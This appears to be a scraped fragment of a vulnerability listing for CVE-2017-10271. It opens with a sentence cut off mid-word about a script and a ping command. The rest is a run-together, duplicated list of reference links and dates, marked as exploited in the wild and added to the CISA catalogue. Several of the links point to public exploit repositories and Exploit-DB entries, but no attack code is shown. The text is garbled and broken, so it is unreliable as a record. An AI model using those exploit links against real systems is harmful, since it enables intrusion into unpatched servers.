I was not able to use that script with a `ping` command, which might hav
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.htmlhttp://www.securityfocus.com/bid/101304http://www.securitytracker.com/id/1039608https://github.com/c0mmand3rOpSec/CVE-2017-10271https://www.exploit-db.com/exploits/43458/https://www.exploit-db.com/exploits/43924/http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.htmlhttp://www.securityfocus.com/bid/101304http://www.securitytracker.com/id/1039608https://github.com/c0mmand3rOpSec/CVE-2017-10271https://www.exploit-db.com/exploits/43458/https://www.exploit-db.com/exploits/43924/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-10271
2017-10-19
Published
2022-02-10
Added to CISA KEV
Exploited in the wild